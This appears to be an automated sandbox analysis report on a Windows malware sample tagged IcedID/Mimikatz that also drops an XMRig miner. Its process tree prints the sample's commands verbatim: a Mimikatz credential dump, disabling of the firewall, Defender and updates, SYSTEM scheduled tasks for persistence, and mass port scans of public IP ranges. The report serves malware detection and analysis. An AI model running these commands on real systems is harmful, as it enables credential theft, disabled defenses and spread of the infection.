Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
31/05/2024, 04:59
General
-
Target
2024-05-31_afff61bb2a9116e683f854e14a87c030_hacktools_icedid_mimikatz.exe
-
Size
8.0MB
-
MD5
afff61bb2a9116e683f854e14a87c030
-
SHA1
86a8b52a628fdbe7ee235cb9497fa40993eec519
-
SHA256
3a71c870f9dd034cf7c665171386e44caae8c5d9243b442670c76e8446123617
-
SHA512
b3edb8d9435ae53d5cdfe8a60578e01c63886b5b9d8d369e136a5e1e855cba8c56ca82b12e546c8b0d28b21e208f906e95a7a36fabbd3f9d5bbf6abf07bea808
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (31365) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 41 IoCs
-
XMRig Miner payload 13 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 28 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\bqlecefir\nuecpe.exe"C:\Windows\TEMP\bqlecefir\nuecpe.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-31_afff61bb2a9116e683f854e14a87c030_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-31_afff61bb2a9116e683f854e14a87c030_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\eirjfhqr\emeqieq.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\eirjfhqr\emeqieq.exeC:\Windows\eirjfhqr\emeqieq.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\eirjfhqr\emeqieq.exeC:\Windows\eirjfhqr\emeqieq.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kdeqkfruy\qtbzhesce\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\kdeqkfruy\qtbzhesce\wpcap.exeC:\Windows\kdeqkfruy\qtbzhesce\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kdeqkfruy\qtbzhesce\uisrzlgqm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kdeqkfruy\qtbzhesce\Scant.txt2⤵
-
C:\Windows\kdeqkfruy\qtbzhesce\uisrzlgqm.exeC:\Windows\kdeqkfruy\qtbzhesce\uisrzlgqm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kdeqkfruy\qtbzhesce\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kdeqkfruy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kdeqkfruy\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\kdeqkfruy\Corporate\vfshost.exeC:\Windows\kdeqkfruy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iypiykyrf" /ru system /tr "cmd /c C:\Windows\ime\emeqieq.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "iypiykyrf" /ru system /tr "cmd /c C:\Windows\ime\emeqieq.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kieqrijsh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\eirjfhqr\emeqieq.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kieqrijsh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\eirjfhqr\emeqieq.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rclqpftqm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bqlecefir\nuecpe.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rclqpftqm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bqlecefir\nuecpe.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 792 C:\Windows\TEMP\kdeqkfruy\792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 372 C:\Windows\TEMP\kdeqkfruy\372.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 2092 C:\Windows\TEMP\kdeqkfruy\2092.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 2500 C:\Windows\TEMP\kdeqkfruy\2500.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 2764 C:\Windows\TEMP\kdeqkfruy\2764.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 2808 C:\Windows\TEMP\kdeqkfruy\2808.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 3120 C:\Windows\TEMP\kdeqkfruy\3120.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 3832 C:\Windows\TEMP\kdeqkfruy\3832.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 3924 C:\Windows\TEMP\kdeqkfruy\3924.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 3988 C:\Windows\TEMP\kdeqkfruy\3988.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 4068 C:\Windows\TEMP\kdeqkfruy\4068.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 1504 C:\Windows\TEMP\kdeqkfruy\1504.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 4548 C:\Windows\TEMP\kdeqkfruy\4548.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 1608 C:\Windows\TEMP\kdeqkfruy\1608.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 1492 C:\Windows\TEMP\kdeqkfruy\1492.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 3576 C:\Windows\TEMP\kdeqkfruy\3576.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kdeqkfruy\etktcclqq.exeC:\Windows\TEMP\kdeqkfruy\etktcclqq.exe -accepteula -mp 3004 C:\Windows\TEMP\kdeqkfruy\3004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\kdeqkfruy\qtbzhesce\scan.bat2⤵
-
C:\Windows\kdeqkfruy\qtbzhesce\neeqrhpfb.exeneeqrhpfb.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\meouau.exeC:\Windows\SysWOW64\meouau.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\emeqieq.exe1⤵
-
C:\Windows\ime\emeqieq.exeC:\Windows\ime\emeqieq.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bqlecefir\nuecpe.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\bqlecefir\nuecpe.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\eirjfhqr\emeqieq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\eirjfhqr\emeqieq.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\emeqieq.exe1⤵
-
C:\Windows\ime\emeqieq.exeC:\Windows\ime\emeqieq.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bqlecefir\nuecpe.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\bqlecefir\nuecpe.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\eirjfhqr\emeqieq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\eirjfhqr\emeqieq.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
26.0MB
MD52362a80bebb6bf7c337b1a2660150c9a
SHA1ba71d26e6016bff95adc0f0e62e0ffed6c8b67e0
SHA25683a5f194f6ece54c81c6f3cd4c9f5580d71e67539458a912a3263f8e51275c3a
SHA512ed5477f10f3f129f096f2641a2c627f4cc7f549756675e606f1c4ee9ad22fa6256c23bd4d4fd402a7d6aac86be9a033f928f54ecd6e6252078039cd2dd390428
-
Filesize
8.7MB
MD5bad83561da2794561b736b6630c344e5
SHA152c0aa78cfdc46c0146d83528e54e6e2e7942901
SHA2560d81fdffbb9bb31eb7ce4415ce8d33e00e58417c8734f88f84e9b340e20717c7
SHA51223026f2e2d7762665cb566df96258a13ff20f265862189623ca43da1b60b3900ecafdbef4c2ee2dd1f814414f0fba50ba76dff07446ae9b8c4c299390dbc5649
-
Filesize
4.2MB
MD58c181857841e986850ac9845cd4c5001
SHA1592943df03d3fa1664656c0971706d7cef3d1db2
SHA2560cfe7913b09834d45fe71c6a28efd755e9212e861ed393c8961ef67ac15c7868
SHA51295a83b996e54dc0386c4f3488b9552c526ce2069abb2ffc40297146cdec62efc3af29a96d8bdc8bff0b86cbda11d802432fef5d4da2b04466af94278f092d8b1
-
Filesize
3.6MB
MD599165d21eed6b7365259259e9a756414
SHA1d6e41aa68e202a50729639ebcc39a75ead84bcf0
SHA256dbd417c1f773a5edc61b9b7e0ee2600e4c91ee4eb97ac489b05f2d128ebb3e8d
SHA5125296dc30287f78355abe72dea205176353debdc35203a7eed5e421930f5c7bb3387294aad9a2c386d18d1b09ced3c99f62463d41dc61906dfe1abc3bdcdec357
-
Filesize
2.9MB
MD50a7cfc1634dbc987aec3c9afd48b5a21
SHA14f31301fe7561318c949acb22e2c912965042890
SHA256e92a53f8ec0ee5aff12fa7ad1dd717f21a1bedf3fd0c43d50393794dcfccf965
SHA51220fc00c912e3cc702d31a36cb1804bf6f89baf9256aa06b06370917c704e43ab062f15b02d852676002933fcd48517b708b350cf1d0482850033eb3d71fdcb04
-
Filesize
7.7MB
MD514d6f501d5dc824b1e3d0c57c6cdb341
SHA1687b76bd8ef280e872bb717cfbb5fa3766322a97
SHA256f96dac3952e30a78e8bc990e75145fbb2661c79332214cad486c12e44b70fbf6
SHA5128a6b5683620b432fecedb4299102855415d1943d7556284c1d15123c756e956b75e0fc2482b5accb37186c3da5ea23f7bf6e68edac481c6e315960ad1277239d
-
Filesize
814KB
MD5118fbd0c79279957ea5c4c2ae3007bd3
SHA1f1fad63f86381955078456385311713be1f6607e
SHA2562cd5657c82d146bfa11db51ac57e3a660724cc0664ca78e6311eec63d071588d
SHA51289dbe6781e0970112cfb9f56709e24a15887f126f99a0153c33a3cb9fcb18fe8aafa9e7f10461d9fa86d4f3ddd18078a1bdc40f63171f19a2fd1603afbd77205
-
Filesize
33.1MB
MD59c47a652d20580c40de70998f522d089
SHA132cf9bf51b52d1c0de6c6385f143c9060f0685a5
SHA25632ac5edc9fedbef8236df7739ec3a64b67ae0fced71ddd5fb5e5c91af21a5c32
SHA512c74655a050cfabf5ab792a86dd23a0b8611f8e52e5298f48552ab11ed29f14b9014380f98d51a190cdb616b6c669dd4ea42aeed01b6a36a34733d60465ef9b06
-
Filesize
2.3MB
MD5fe09a3e3b4f8c2c21b2e2d2e40d109f6
SHA1827a86985004fb03cddb3b8d3afd011d4b918e99
SHA2566038df75ca57ccfc6cd8673a5065e9301fbae10dadd913b7855fb1d3fc519d2c
SHA512ead9c1920051c776e4ede3652e7802a323f6e86f6cdbb07d91921b4befbc3e3cf8fa0ba30b17b6464502e3dec6fed02f9e0af674a9f1a60264d5013487e32ddc
-
Filesize
21.1MB
MD518fceebf814956f9672921ec8f9aa44c
SHA13bbbaf9adbce480b732db0ff73b8dcdcecb0a5b8
SHA2560c1c01ba1b0b970551912cb54555b5e7f3c17176213bb6e8eac34b838c076053
SHA5122657f66ebede1ba061cc033a4aa7b63e31a24f360dad54b11ecf1535f42f71dd6b4ce2ff6a5fef2b06f39500c93b413c8e493603b612f29e4b4be1fe92a16922
-
Filesize
4.3MB
MD54005b492d536cb52064978bb97896934
SHA14661f76b4a7a4baf90766fe1e4088810c7c16a87
SHA2563311df1998a2fb8fb74e4c931af74a7afa1d675d68fb1307b90d9e7478ed1a5f
SHA5127052c08887862821af08bd36dab0878fc3e655887b2f11bce86612613d4264631a3056663118c0647bdedcd420c135d06701184b0e1f67c5dcd8dbeea05f8852
-
Filesize
45.3MB
MD5c213830c353dcf46bf5f01c4bbe0dd79
SHA1b2cec884a188573d2c35cc323de2e3b197520422
SHA25611db2b79248f263d9d942019b7a8595db490b17e5d3f4a71c36d95eca1ca7593
SHA512238eade32eb4151bcf539909b64e192a7b32f45b88bfa6fe6a57439f9a08ff0f8466e9b6c40f1e4e56d85dcea526f4712361d963d66aa9afb860493e6c4d38ef
-
Filesize
1.2MB
MD5e4585758499f0a2b50a758d20cbcf639
SHA16420bd17b20ab26d76aecc79ce5ce0f515d2fb2a
